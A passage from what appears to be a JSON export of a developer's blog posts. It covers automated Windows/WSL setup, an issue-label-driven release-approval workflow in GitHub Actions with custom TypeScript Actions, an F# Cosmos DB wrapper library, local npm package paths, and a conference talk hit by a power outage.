confusion.\n— Hayley Stewart 🍍👩‍💻🐶 (@hayley_codes) January 22, 2020 Aside: Amy has done one too that you should also check out.\nI’ve done development primarily on Windows for over 15 years now so setting up an environment is something I’m rather familiar with, and coincidentally in the past week I’ve setup 3 machines because, first up, my primary work machine was having some issues so I thought it’s best for a refresh, which turned out to actually be a hardware failure. Next, I setup an old device while I wait for a replacement to be shipped, and finally, my replacement arrived a lot sooner than expected so I’ve just set that one up. All in all, I’ve done 3 machine setups in the past week so I’m getting the hang of it! 🤣\nWhat I Need To get started let me explain a bit about my requirements and how I like to have my machine running. I’m a minimalist when it comes to my machine, I don’t keep tabs open in the browser (right now I have 3 tabs open, Twitter, Amy’s post and this posts preview), I don’t have apps running I’m not using (Outlook, Edge Canary, VS Code, Terminal, Slack and Teams are all that are open right now) nor do I have software that I “might” need installed (if it’s transient, there’s a Docker image for that).\nGiven that I’m primarily writing either .NET or Node apps I’m not going to waste time installing languages and runtimes that I’m not actively working with. Also, I do this primarily in Windows Subsystem for Linux, specifically WSL2, so I really have two machines to setup.\nFor me, the OS install is a transient state, nothing on the machine is meant to last so if it’s not in a git repo or on OneDrive, it’s not something I actually care about, because I’ll blow the machine away periodically and start from scratch.\nScript All The Setups Because of this I script the setup as much as I can, I don’t want to spend hours finding software, I want to hit the big red “deploy dev environment” button. Conveniently, I have those scripts available in my system-init repo on GitHub.\nScript 1 - Windows Occasionally I came across tools or codebases that don’t work well in WSL, or maybe there’s a GUI that I need and I can’t be bothered with an X11 server, so that means I do setup Windows for dev and for that I have a PowerShell script.\nTo simplify the install of software on Windows I use Chocolatey for most of the stuff I want to install:\nGit My .gitconfig is in the repo so I download that too VS Code Insiders (I want the bleeding edge!) I sign into the preview Settings Sync feature and VS Code is all setup for me .NET Core SDK (latest version) Fiddler (web proxy/network debugger) Postman LINQPad Firefox Google Chrome I manually install Edge Canary as it’s the first thing I install (until it just ships in the box!) so I add the other browsers just for cross-browser testing.\nThere’s a few other things I’ll manually install as they ship via the Windows Store and automating installs from that is a bit trickier:\nWindows Terminal (I want a decent terminal) I keep my settings for Terminal in the repo and copy them in once installed Cascadia Code PL font Ubuntu as my WSL distro Visual Studio Preview (I’m too lazy to work out how to automate the install of that) Once the applications are installed I install a few PowerShell modules from PowerShell Gallery:\nPosh-Git Show the git status in the PowerShell prompt PowerShell nvm A Node Version Manager using PowerShell semantics that I wrote The README.md has the command to run to install it (from an admin PowerShell prompt) and I kick back for a period of time while it does its thing.\nScript 2 - WSL With Windows setup it’s time to setup my WSL environment. I don’t automate the activation of WSL2, mainly because it requires a reboot so I have to interact with the machine anyway and then I can control when I do it, but once WSL2 is activated and the Ubuntu distro installed I kick off the setup.sh bash script I’ve written. This was originally written to setup WSL or Linux as a primary OS, so there’s some old code in there, but the main stuff I run is:\n1 2 3 4 install_git install_shell install_docker install_devtools I also kick off an sudo apt-get update && sudo apt-get upgrade to ensure I am all up to date.\nThis installs:\ngit I pull down the same .gitconfig as I use on Windows but change autocrlf to false and set the path of the credential helper to the Git Credential Manager for Windows which allows me to use the same git credentials from WSL2 and Windows, and also gives me the nice MFA prompt through to GitHub (I prefer username/password/MFA over ssh keys) zsh and oh my zsh My .zshrc is in the repo tmux (a terminal multiplexer, basically makes my terminal more powerful) Docker (using the standard Ubuntu install) .NET Core SDK (2.2 LTS and 3.1 LTS) I prompt to install the v5 preview too Optionally install Golang fnm which is a simple Node Version Manager And after a little bit more time my script completes and all my stuff is setup.\nConclusion There we have it folks, this is how I setup my dev environment as a Windows user across Windows and WSL. Again, the scripts are all on GitHub so feel free to use/fork my scripts as you like.\nI hope it’s been helpful to see how you can automate most of the environment setup.\n", "id": "2020-03-25-how-i-setup-a-windows-dev-environment" }, { "title": "Approval Workflows With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2020-03-23-approval-workflows-with-github-actions/", "date": "Mon, 23 Mar 2020 10:27:04 +1100", "tags": [ "devops" ], "description": "How to create an approval-based workflow with GitHub Actions", "content": "I’ve been doing a bunch of work with GitHub Actions recently, from deploying Azure Functions to overhauling my blog pipeline but each of these workflows have been rather straight forward, just build and deploy all off the one workflow.\nWith my latest project, FSharp.CosmosDb, I wanted to use GitHub Actions but the workflow I want is a little more complex. For other OSS projects such as dotnet-delice the workflow works like so: I push to master it will compile the application, create the NuGet packages and then wait for me to approve the release before pushing to NuGet, creating the GitHub Release and tagging the right commit. This gives me a level of control against accidental pushes to master and I handle this through Azure Pipeline which supports a simple approval flow, clicking an “approve” button.\nBut at the moment GitHub Actions doesn’t have functionality to do approvals, so I have created me own! If you just want to see the final pieces here’s the build workflow and release workflow, but you’ll want to read one to understand how they work. 😊\nDefining Our Workflow The idea behind this workflow is something that I think is rather common in open source projects, I want to have the build and package as a single workflow and then these assets made available for people to consume and test, then based on feedback (the release is good or not) it’ll be “promoted” to an official package repository, GitHub Release is created, commits are tagged, all that sort of thing.\nThe build is going to be pretty straight forward, I’m using FAKE to script up the build workflow and I’m using a changelog following Keep A Changelog to define a release and its details. The job looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 jobs: build: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@master - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Restore dotnet tools run: dotnet tool restore - name: Generate packages run: dotnet fake run ./build.fsx --target Release Now I’ve got my artifacts I want to setup some metadata to be made available, such as the version number from the changelog. To do this I’ve created a special FAKE task:\n1 2 3 4 5 6 7 let getChangelog() = let changelog = "CHANGELOG.md" |> Changelog.load changelog.LatestEntry Target.create "SetVersionForCI" (fun _ -> let changelog = getChangelog() printfn "::set-env name=package_version::%s" changelog.NuGetVersion) Notice how it does printfn of ::set-env? This is how you create your own environment variables and it conveniently works from anywhere that writes to stdout.\nWith this read we can add it to the workflow:\n1 2 3 4 5 6 7 8 - name: Set Version run: dotnet fake run ./build.fsx --target SetVersionForCI - name: Create version file run: echo ${{ env.package_version }} >> ${{ env.OUTPUT_PATH }}/version.txt - name: Publish release packages uses: actions/upload-artifact@v1 Approvals Through GitHub Issues When I was thinking about how to do approvals I was thinking “What in GitHub would you use to discuss and approve something?” and there’s an obvious answer, Issues! My thought is that if I can automate the creation of an issue and label it appropriately I can then use the GitHub Actions trigger of Issue Labeled to monitor for a certain label to kick things off. In my case, I’m going to have a label of release-approved and once that label is applied I want to run the workflow to release the packages.\nCreating Issues With GitHub Actions If you look on the Actions Marketplace there’s plenty of Actions for creating an issue, but I am going to have a few weird requirements so I decided to build my own (also, I hadn’t built my own Action so this was another good chance to learn). This (and the others we’ll build) are part of my git repo and not on the marketplace, so they’ll live in the .github/actions folder, alongside the workflows and they’ll be written in TypeScript.\nFirst off I’d recommend that you read how to create an Action if you’ve not done one before as it’ll talk through the setup guide and the files you’ll need.\nBecause we’ll be working with GitHub Issues we’ll need an access token, which is conveniently available as a secret variable of secrets.GITHUB_TOKEN and I’m going to pass in two more arguments, the ID of the current action (github.run_id) and the version of the release (env.package_version).\nWe’ll start by creating our empty action:\n1 2 3 4 5 6 7 import * as core from "@actions/core"; import * as github from "@actions/github"; import * as fs from "fs"; async function run() {} run(); And now we can start populating the run function:\n1 2 3 4 5 6 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; } This gives us access to the GitHub API via octokit. Now I want the changelog as I want to dump that into the body of the issue we’re creating (so while approving I can work out what is in the release):\n1 2 3 4 5 6 7 8 9 10 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; const changelog = fs.readFileSync("./.nupkg/changelog.md", { encoding: "UTF8", }); } Note: This file is created by one of my FAKE tasks and only contains the current version changelog, not the full history, like the root CHANGELOG.md contains.\nNow to create the issue:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; const changelog = fs.readFileSync("./.nupkg/changelog.md", { encoding: "UTF8", }); const newIssue = await octokit.issues.create({ ...context.repo, labels: [`awaiting-review`, "release-candidate"], title: `Release ${core.getInput("package-version")} ready for review`, body: `# :rocket: Release ${core.getInput( "package-version" )} ready for review ## Changelog --- ${changelog} `, }); } Because we have context.repo to give us the information about the current GitHub repo I just spread (...context.repo) that onto the input of octokit.issues.create and then give it a few more pieces of information, the labels of awaiting-review and release-candidate, a title and the body, which contains the changelog. These labels are useful for me to create filters in GitHub Issues and I can look for them in a future workflow.\nAnd now we’re done, it’s time to plug it into our build workflow:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - name: Prepare create release issue action uses: actions/setup-node@v1 with: node-version: "12.x" - name: Building Action run: npm i && npm run build working-directory: ./.github/actions/create-issue - name: Create Release Issue uses: ./.github/actions/create-issue with: token: ${{ secrets.GITHUB_TOKEN }} action-id: ${{ github.run_id }} package-version: ${{ env.package_version }} Since I chose to do these a TypeScript I have to add 2 additional steps to the workflow, one to setup Node.js and one to compile the Action, but the important stuff is in the 3rd Action. As it’s a local Action the use points to the directory that it lives in, which is an absolute path from the root of the git repo (so you don’t have to use .github/actions, but I like to keep them all together).\nAnd there we go, the workflow creates our issue (yes it’s closed because I approved it already 😉):\nApproving Releases This proved to be a bit tricker than I had hoped, so I hope that this will help you avoid some of the challenges I hit with this step. First off, we’re using the Issue Labeled event in GitHub Actions which will trigger every time you label an issue, so if you use issues heavily your Action history will likely become quite noisy. This means that you’ll need to think of a way to only run when the right label is added, so to do that I created an Action to check if an issue has a specific label:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import * as core from "@actions/core"; import * as github from "@actions/github"; async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } const issue = await octokit.issues.get({ ...context.repo, issue_number: context.payload.issue.number, }); core.setOutput( "exists", issue.data.labels .some((label) => label.name === core.getInput("label")) .toString() ); } run(); The Action is reasonably straight forward, it’ll grab the issue that triggered the workflow from the Action context and look if the label passed into the Action was present and set an output parameter indicating its presence. We’ll use the Action like so:\n1 2 3 4 5 6 - name: Check issue was release issue uses: ./.github/actions/check-issue id: check-issue with: token: ${{ secrets.GITHUB_TOKEN }} label: release-candidate Remember to install the packages and build the Action first, I’ve just skipped that for brevity here.\nThe problem is though that now every Action after this we need to check the output to decide if we want to run it, meaning we add if: steps.check-issue.outputs.exists == 'true' to every Action, which is annoying. If someone knows how to improve that I’m all ears!\nGetting Release Artifacts Since the build phase generated the artifacts and we might’ve run a number of workflows since then we need to get the right artifacts. In the past I’ve used upload-artifact and download-artifact to handle this (and in the build workflow I used upload-artifact) but here’s the problem, the download expects to download from the current workflow, but I’m not in the workflow that the artifact was created, I’m on a completely new one, so how do I know what artifacts to get?\nTo do this we’re going to update the create-issue Action we created earlier to include the ID of the Action in it somewhere. Initially, I thought to do this as a label, so you would have a label like actionid: <id>, but on a busy repository it’s likely that that will become annoying quickly as each label is single use and they aren’t automatically deleted. So instead let’s create a comment on the issue with the Action ID. Right after we created the issue we’ll add this:\n1 2 3 4 5 await octokit.issues.createComment({ ...context.repo, issue_number: newIssue.data.number, body: `Action: ${core.getInput("action-id")}`, }); With the comment appended we’ll create another Action to extract it, I called this get-action-id:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import * as core from "@actions/core"; import * as github from "@actions/github"; async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } const comments = await octokit.issues.listComments({ ...context.repo, issue_number: context.payload.issue.number, }); const actionComment = comments.data.find( (comment) => comment.body.indexOf("Action: ") >= 0 ); if (!actionComment) { throw new Error("No comment found that has the right pattern"); } core.setOutput("id", actionComment.body.replace("Action: ", "").trim()); } run(); Again this is all happening in the context of an issue so we know where to look up the comments, which we do with octokit.issues.listComments and then from that we’ll look for a comment that matches the pattern we expect, to start with Action:. If that’s found we can pull the ID out of it and push it as an output variable!\n1 2 3 4 5 6 - name: Get the ID of the Action uses: ./.github/actions/get-action-id if: steps.check-issue.outputs.exists == 'true' id: get-action-id with: token: ${{ secrets.GITHUB_TOKEN }} With the Action ID in hand we now can download the Actions, and for this I decided to be lazy and just write an inline bash script:\n1 2 3 4 5 6 7 8 9 10 11 12 - name: Download packages if: steps.check-issue.outputs.exists == 'true' run: | echo ${{ steps.get-action-id.outputs.id }} mkdir ${{ env.OUTPUT_PATH }} cd ${{ env.OUTPUT_PATH }} curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }}/artifacts --output artifacts.json downloadUrl=$(cat artifacts.json | jq -c '.artifacts[] | select(.name == "packages") | .archive_download_url' | tr -d '"') echo $downloadUrl curl $downloadUrl --output packages.zip --user octocat:${{ secrets.GITHUB_TOKEN }} --verbose --location unzip packages.zip ls Ouch, that’s complex, let’s break it down. I start with a bit of diagnostics info so I can see what the Action ID is and then create the location I want to dump the files into. Next we need to get the info about the artifacts for the release:\n1 curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }}/artifacts --output artifacts.json We’re grabbing the output of the previous step and making a call to the GitHub API and getting back a JSON like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 { "total_count": 1, "artifacts": [ { "id": 2861674, "node_id": "MDg6QXJ0aWZhY3QyODYxNjc0", "name": "packages", "size_in_bytes": 39715, "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/artifacts/2861674", "archive_download_url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/artifacts/2861674/zip", "expired": false, "created_at": "2020-03-13T03:37:13Z", "updated_at": "2020-03-13T03:37:14Z" } ] } I want the archive_download_url from the artifact named packages, and to do that I’ve again been tricky and used jq to find it:\n1 downloadUrl=$(cat artifacts.json | jq -c '.artifacts[] | select(.name == "packages") | .archive_download_url' | tr -d '"') Since this would have the " around it I use tr to strip them as well.\nLastly, we download the zip package from that location using curl, but you need to authenticate this request so we pass the --user octocat:${{ secrets.GITHUB_TOKEN }} to curl as well as --location to tell it to follow the 302 redirect. And with the package downloaded we can unzip it and I just run ls to do some more logging.\nPublishing To NuGet With the packages downloaded we can start pushing them to the various feeds, let’s start with NuGet. I didn’t feel the need to use a 3rd party Action for this since you only need to run dotnet nuget push (Note: you will need a NuGet access token, so pop one in your secrets), but what I did need to know was what was the version number to put into the file path when publishing.\nThankfully, I created a file that I pushed into the artifacts list called version.txt that contains the version number from CHANGELOG.md. Let’s turn that into an environment variable:\n1 2 3 4 5 6 - name: Get release version if: steps.check-issue.outputs.exists == 'true' working-directory: ${{ env.OUTPUT_PATH }} run: | version=$(cat version.txt) echo "::set-env name=package_version::$version" Good ol’ cat to the rescue. Then we can setup the dotnet environment and push to NuGet:\n1 2 3 4 5 6 7 8 9 10 11 12 - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 if: steps.check-issue.outputs.exists == 'true' with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Push NuGet Package if: steps.check-issue.outputs.exists == 'true' working-directory: ${{ env.OUTPUT_PATH }} run: | dotnet nuget push FSharp.CosmosDb.${{ env.package_version }}.nupkg --api-key ${{ secrets.NUGET_KEY }} --source ${{ env.NUGET_SOURCE }} dotnet nuget push FSharp.CosmosDb.Analyzer.${{ env.package_version }}.nupkg --api-key ${{ secrets.NUGET_KEY }} --source ${{ env.NUGET_SOURCE }} And with that we have packages on NuGet.\nCutting a Release The last thing to do is create a GitHub Release, which will mean we need to know what SHA the build was triggered from. Initially, I thought to do this by added it to the comments of the issue (which I do still do) but then I realised that I know the ID of the original workflow so I can just pull the metadata from there:\n1 2 3 4 5 6 7 8 - name: Get Action sha if: steps.check-issue.outputs.exists == 'true' run: | echo ${{ steps.get-action-id.outputs.id }} cd ${{ env.OUTPUT_PATH }} curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }} --output run.json action_sha=$(cat run.json | jq -c '.head_sha' | tr -d '"') echo "::set-env name=action_sha::$action_sha" Again there’s a bit of jq parsing of output to find it, but now we have the full SHA in an environment variable, so we can create the release, which I’ve defined a custom Action for (mainly to fit the way I want it structured, but you could use one from the marketplace if you prefer).\nThis time let’s look at the usage of the Action first:\n1 2 3 4 5 6 7 8 - name: Cut GitHub Release uses: ./.github/actions/github-release if: steps.check-issue.outputs.exists == 'true' with: token: ${{ secrets.GITHUB_TOKEN }} sha: ${{ env.action_sha }} version: ${{ env.package_version }} path: ${{ env.OUTPUT_PATH }} The result of running it will see an Release like this:\nThis Action we’ll create the release for the right SHA then upload the files to it (I don’t pass in the files, I’m hard-coding them), so let’s look at the run function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 async function run() { const token = core.getInput("token"); const sha = core.getInput("sha"); const version = core.getInput("version"); const artifactPath = core.getInput("path"); const releaseNotes = readFileSync(join(artifactPath, "changelog.md"), { encoding: "UTF8", }); const octokit = new github.GitHub(token); const context = github.context; const release = await octokit.repos.createRelease({ ...context.repo, tag_name: version, target_commitish: sha, name: `Release ${version}`, body: releaseNotes, }); await upload( octokit, context, release.data.upload_url, join(artifactPath, `FSharp.CosmosDb.${version}.nupkg`) ); await upload( octokit, context, release.data.upload_url, join(artifactPath, `FSharp.CosmosDb.Analyzer.${version}.nupkg`) ); } The octokit.repos.createRelease is our first main step, we use the current context to set the repository info and then set the tag_name to the version defined in our changelog and the target_commitish to the right SHA, which will create the git tag for us (nice!) and then we set the title and finally the body I’m just injecting the changelog in (which will force me to write a decent changelog!).\nWhen it comes to attaching files to a release, this is something you need to do for each file once the release is created, as creating the release gives you an upload_url for where the files need to be POST’ed to. Since I do this multiple times I pulled out a function to handle it called upload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 async function upload( octokit: github.GitHub, context: Context, url: string, path: string ) { let { name, mime, size, file } = fileInfo(path); console.log(`Uploading ${name}...`); await octokit.repos.uploadReleaseAsset({ ...context.repo, name, file, url, headers: { "content-length": size, "content-type": mime, }, }); } This uses the octokit.repos.uploadReleaseAsset function to send the file and we need to provide it with the size (content-length) and the mime type (content-type), which I get through a function that grabs the file information called fileInfo:\n1 2 3 4 5 6 7 8 9 10 11 12 function mimeOrDefault(path: string) { return getType(path) || "application/octet-stream"; } function fileInfo(path: string) { return { name: basename(path), mime: mimeOrDefault(path), size: lstatSync(path).size, file: readFileSync(path), }; } To get the mime type I use the mime npm package, but I could’ve hard-coded it since I’m hard-coding the files anyway, but that was just a habit. Otherwise I’m using lstatSync and readFileSync from Node’s fs module.\nAnd with that the Release is created and the packages are available for people to manually download if they don’t want to use NuGet for some reason.\nClosing The Issue The last thing I wanted to automate is the closing of the issue being used to manage the workflow. By now I was on a roll of creating custom Actions so I created another one (I also didn’t find one for just closing an issue, they were all for stale issues or PR’s, but maybe I didn’t look hard enough).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } await octokit.issues.createComment({ ...context.repo, issue_number: context.payload.issue.number, body: core.getInput("message"), }); await octokit.issues.update({ ...context.repo, issue_number: context.payload.issue.number, state: "closed", }); } For convenience we’re adding a comment to the issue using a provided message, done via octokit.issues.createComment, and then updating the issue status using octokit.issues.update and setting the state: "closed". From our workflow file we can then use it like this:\n1 2 3 4 5 6 7 8 9 10 11 - name: Close issue uses: ./.github/actions/close-issue if: steps.check-issue.outputs.exists == 'true' with: token: ${{ secrets.GITHUB_TOKEN }} message: | The release has been approved and has been * Deployed to NuGet * Created as a Release on the repo * Commit has been tagged And with that, once the issue is labelled with release-approved my interactions are done!\nConclusion My goal at the start was to create an approval based workflow with GitHub Actions and I’m pretty happy that I was able to get it done. You can find the most recent (at the time of writing) build and release runs through, and if you look into the closed issues you’ll find them there too.\nIt is a little cumbersome though, without built-in approval support there was a lot of custom Actions I ended up writing (my repo now reports 10% of the codebase is TypeScript 🤣) so I hope it’s a feature on their roadmap.\nAlso, it’s not 100% fool-proof. At the moment I don’t check the labels properly, it should check for the release-approved label as well as release-candidate, because if I was to put a different label it’ll just run through. But since I’m the only contributor here I’m less concerned about that at the moment.\nOverall I’m happy with how it works and I hope it gives you an insight into how you too can have an approval-based workflow using GitHub Actions.\n", "id": "2020-03-23-approval-workflows-with-github-actions" }, { "title": "Introducing FSharp.CosmosDb", "url": "https://www.aaron-powell.com/posts/2020-03-16-introducing-fsharp-cosmosdb/", "date": "Mon, 16 Mar 2020 20:19:50 +1100", "tags": [ "fsharp", "azure", "cosmosdb" ], "description": "Introducing a library to make Cosmos DB easier with F#", "content": "I’ve recently been doing some work with Cosmos DB and not just because there was a free tier announced at the start of March (although that’s appealing! 😉).\nOne of the main use cases I have for it is to replace the Table Storage backend of my IoT project with something a bit more flexible, and this means that I’m writing F#.\nCosmos DB for .NET When it comes to working with Cosmos DB in .NET the Azure SDK team is working on a v4 SDK that I decided to use (even though it’s still in preview).\nUnfortunately, the SDK doesn’t feel particularly friendly to F# developers, mainly because it relies on the .NET Task API rather than F#’s Async, so I wanted to make something that felt a bit more like F# code.\nIntroducing FSharp.CosmosDb To this end I’ve created FSharp.CosmosDb, a wrapper API over the top of the .NET SDK. The initial release is up on NuGet and currently supports querying for data:\n1 2 3 4 5 6 7 8 9 10 11 12 13 open FSharp.CosmosDb let host = "https://..." let key = "..." let findUsers() = host |> Cosmos.host |> Cosmos.connect key |> Cosmos.database "UserDb" |> Cosmos.container "UserContainer" |> Cosmos.query "SELECT u.FirstName, u.LastName FROM u WHERE u.LastName = @name" |> Cosmos.parameters [ "name", box "Powell" ] |> Cosmos.execAsync<User> Breaking It Down Here we’ve got a pipe-able API, starting with the host endpoint for our Cosmos instance, then providing the authorisation key. This will allow us to setup a connection to Cosmos and then we can start working with it. Then we can specify the database and container that we’ll work with before writing a query and providing parameters (if required).\nThe last step is Cosmos.execAsync<'T> which takes a type argument that we want to unpack our query results into. This will provide an AsyncSeq for you to iterate over asynchronously. Until you run Cosmos.execAsync<'T> nothing has happened with Cosmos, in fact, it uses a record type to wrap up the information provided so you can pass it around easily.\nSome Notes This first version is a little rough around the edges, I won’t deny that, so here’s a few things to be aware of:\nThe argument for Cosmos.parameters is (string * object) list so you have to box the value argument. This is because the underlying API takes an object value, but if anyone can think a better approach let me know If the type provided to execAsync is a record type it must be marked as [<CLIMutable>]. I need to find a way to work around that so we can use plain record types It doesn’t support connection string connections, only host + key access (easy fix, just requires some time) I haven’t written docs yet, sorry! Conclusion I hope you find this useful, I’m going to keep plugging away at adding features to the API and make it more feature compatible with the full .NET SDK. In the mean time if you try it out let me know what you think. 😊\n", "id": "2020-03-16-introducing-fsharp-cosmosdb" }, { "title": "Making it Easier to Work With Local npm Packages", "url": "https://www.aaron-powell.com/posts/2020-03-02-making-it-easier-to-work-with-local-npm-packages/", "date": "Mon, 02 Mar 2020 08:16:08 +1100", "tags": [ "nodejs" ], "description": "A nifty trick I learnt recently for working with local npm packages", "content": "I was recently doing some work to fix a bug in the Azure Functions Durable JavaScript package that required changing the surface area of an API. I’d done everything that I could to test it, I’d created a new sample, I’d added a unit test for the bug I’d hit and ensured it passed while not breaking the existing tests over the API, all that sort of thing. But I wanted to make sure that the change, while seemingly fixing my issue, would actually fix it, so I wanted to drop the code into project.\nSo I’ve got two git repos on my machine, one with my application in it and one with the updated Azure Functions code, and I want to use that over the package that would come down from npm when I do an npm install.\nWhen you look at npm’s docs it says that I should be using npm link to setup a symlink between the code I want and the node_modules folder in my application, but I’ve always struggled to get it working right, and that’s probably because symlinks on Windows aren’t quite as simple as on *nix (and maybe I’ve been burnt too many times to trust them! 🤣).\nBut, I found a simpler solution! It turns out that in your package.json’s dependencies (anddevDependencies) rather than specifying a package version you can specify a file system path, like so:\n1 2 3 4 5 6 7 8 { ... "dependencies": { "durable-functions": "file:../azure-functions-durable-js", ... } ... } This path that I’ve set is the path to where the package.json for the dependency lives and by using file: it tells the dependency resolver to look for a file system path rather than a locally referenced package. Also, npm install knows not to download something from the registry.\nUsing this pattern can also be useful for doing samples within a repo as the sample can refer to the package by name (doing import something from 'my-package';) rather than using using paths within the sample files (import something from '../../';) which can make the samples match better with how someone would consume the package.\nIt can also be useful to test out if your change does fix the bug that you’ve found by redirecting where your project resolves and not changing your codebase itself.\nI hope this has been a helpful tip and can make it easier for you to work with local packages and also make it easier to test fixes you want to contribute. There’s more information on npm’s docs about this and the other kinds of special paths you can define, such as git repos and HTTP endpoints.\n", "id": "2020-03-02-making-it-easier-to-work-with-local-npm-packages" }, { "title": "Using GitHub Actions With Azure Functions", "url": "https://www.aaron-powell.com/posts/2020-02-28-using-github-actions-with-azure-functions/", "date": "Fri, 28 Feb 2020 09:55:55 +1100", "tags": [ "serverless", "azure", "devops", "azure-functions" ], "description": "I'm back on Visual Studio Toolbox to talk about GitHub Actions and Azure Functions", "content": "I’m back on the Visual Studio Toolbox show and this time we’re looking at the application we worked with in the last video but add a bit of DevOps on it using GitHub Actions!\nI’ve blogged about how to use GitHub Actions with Azure Functions in the past, but that was looking at .NET functions and in this video we’ll look at JavaScript Azure Functions.\nEnjoy!\n", "id": "2020-02-28-using-github-actions-with-azure-functions" }, { "title": "Presenting in the Dark - a Speakers Nightmare", "url": "https://www.aaron-powell.com/posts/2020-02-17-presenting-in-the-dark-a-speakers-nightmare/", "date": "Mon, 17 Feb 2020 11:10:59 +1100", "tags": [ "speaking" ], "description": "When a talk goes bad.", "content": "When you lose power bar emergency lighting mid live-coding demo. Oops ;) #MSIgniteTheTour pic.twitter.com/Dp7HpdvZUQ\n— Matt Brown (@stillaslifematt) February 13, 2020 *Record Scratch*\n*Freeze Frame*\nYep, that’s me. You’re probably wondering how I ended up in this situation.\nLast week at Microsoft Ignite The Tour Sydney I gave a talk and you might notice something odd about that photo, there’s no projector. Also, there’s no overhead lighting and you can’t tell from a picture, but the mic isn’t working.\nIt’s just me and an emergency lighting system.\nWhat Happened About 30 minutes into my session, MOD10 - Migrating Web Applications to Azure, I had just wrapped up a live demo in which I created a vnet using the Azure CLI. I’d stuffed up this demo because I failed to type one of the command line arguments correctly so after a few retries while the audience watched and offered solutions, I got it working.\nBut now the nervous speaker sweats were setting in and I made a joke that I wished the A/C was up a bit as it was getting warm on stage then, as if by fate, the room was plunged into darkness.\nThe Power Goes Out This is pretty much the worst-case scenario as a speaker, the room power is out (we had emergency lighting on and that’s all that lit me on stage), so the projectors are offline and my mic no longer works.\nAs a speaker you plan for failures. If your demo breaks you jump to one you prepared earlier. If the connectivity is poor you rely on a video of the demo. If your laptop crashes you wait for a reboot. There’s not much that can’t be recovered from during a talk if you’ve done some planning.\nBut the power going out, that’s a bit different.\nThe Powers Out, What Next There was 15 minutes left in the talk, I’ve got a few hundred people in the room and all I had left were live demos, so what do I do next?\nThankfully, a power outage actually gave me a moment to think, as the room is in a state of confusion, I started to process my options. In my peripheral vision I could see the AV tech checking the cables coming to the stage but it’s clear that that’s not the problem and they likely have no more information than I do. I decided that going over and talking to them wasn’t going to do anything more than delay a resolution and increase the stress they are likely feeling already.\nSo what should I do? Should I kick everyone out? Well, there’s still 15 minutes left and the optimist in me thinks that the power will come back on and I really want to finish this talk.\nInstead, I decided to have some fun and fall back on my core speaking knowledge, that the slides and demos are only there to supplement the talk, and I should be able to present the story without them.\nIt’s Time for Interpretive Dance Well, not literally. After a quick apology and a suggestion that if people wanted to leave, they could, I picked the talk up from where it had been before the power went out and started describing the next steps. With my laptop still powered on I started creating a VM in Azure (the next demo I had to do) and explained the information you need to provide, the options that appear, the configuration, etc.\nThere was a lot of hand waving and a lot of me projecting my voice as loud as I could (it was a long room) but my intent was to give people enough of an idea of what they would see in the portal should they want to do the demo themselves.\nBut I had another reason to keep going, to try and reduce stress for the AV folks. I had no doubt that they were stressing out on the fact that the room had lost power but if I was to constantly throw looks their way or pointing towards them in any negative fashion (whether in jest or not) wasn’t going to help speed things up. After all, they are doing the best they can to resolve the issues, the least I can do is be professional and let them do their job.\nAfter about 10 minutes it was clear that power wasn’t going to be restored for the remaining 5 minutes so I wrapped up the session, thanked everyone for coming, promised to share the links to demos, slides and a recording so people could see what they missed and called it a day.\nI was surprised that not many people left as a result of the power outage, maybe they were hoping it’d come back on or maybe they were watching with morbid curiosity on how the last 15 minutes would turn out, who knows!\nThe Aftermath I had a few people come up to me and applaud my efforts to keep going given the circumstances and then speaking with the AV person it turns out that half the floor we were on lost power and no one knew why!\nIn the end it was a fun adrenalin rush, I’ve now had a chance to see how I’d really go under pressure, there’s not many other possible failures during a talk that could be worse and hey, it’s a good story to tell! And hey, I know I can power through just about anything that goes wrong during a talk. 🤣\nBut I must admit that the next time I give that talk I do hope to have power for the whole 45 minutes. 😉\n", "id": "2020-02-17-presenting-in-the-dark-a-speakers-nightmare" }, { "title": "Creating Functions With VS Code", "url": "https://www.aaron-powell.com/posts/2020-02-17-creating-functions-with-vscode/", "date": "Mon, 17 Feb 2020 10:58:18 +1100", "tags": [ "serverless", "azure", "vscode", "git" ], "description": "A quick guide on how to use VS Code to work with Git and Azure Functions", "content": "Recently I was in Redmond and was asked if I wanted to record a video for the Visual Studio Toolbox show. I jumped at the opportunity, not only because I haven’t had a chance to record at our studios, but because I’ve been working on a hands-on lab to get people more familiar with VS Code and Git. In this lab we fork a repository but then look at how we can do everything else within VS Code, from working with branches, 